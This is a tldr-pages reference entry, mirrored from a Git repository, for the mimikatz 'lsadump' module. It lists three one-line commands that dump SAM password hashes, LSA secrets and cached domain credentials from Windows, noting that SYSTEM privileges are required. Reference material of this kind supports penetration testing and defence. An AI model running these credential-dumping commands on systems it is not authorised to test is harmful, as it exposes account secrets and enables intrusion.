1
0
Fork 0
mirror of https://github.com/tldr-pages/tldr.git synced 2025-08-15 04:55:52 +02:00
tldr/pages/windows/mimikatz-lsadump.md
Adriano Inghingolo b9aed740bd
mimikatz: add pages (#17405)
Co-authored-by: Managor <42655600+Managor@users.noreply.github.com>
2025-07-30 17:04:22 +03:00

358 B

mimikatz lsadump

Dump secrets from the Windows Local Security Authority (LSA). Requires SYSTEM privileges. More information: https://github.com/gentilkiwi/mimikatz.

  • Dump SAM hashes:

mimikatz "lsadump::sam"

  • Dump secrets from the SECURITY hive:

mimikatz "lsadump::secrets"

  • Dump cached domain credentials:

mimikatz "lsadump::cache"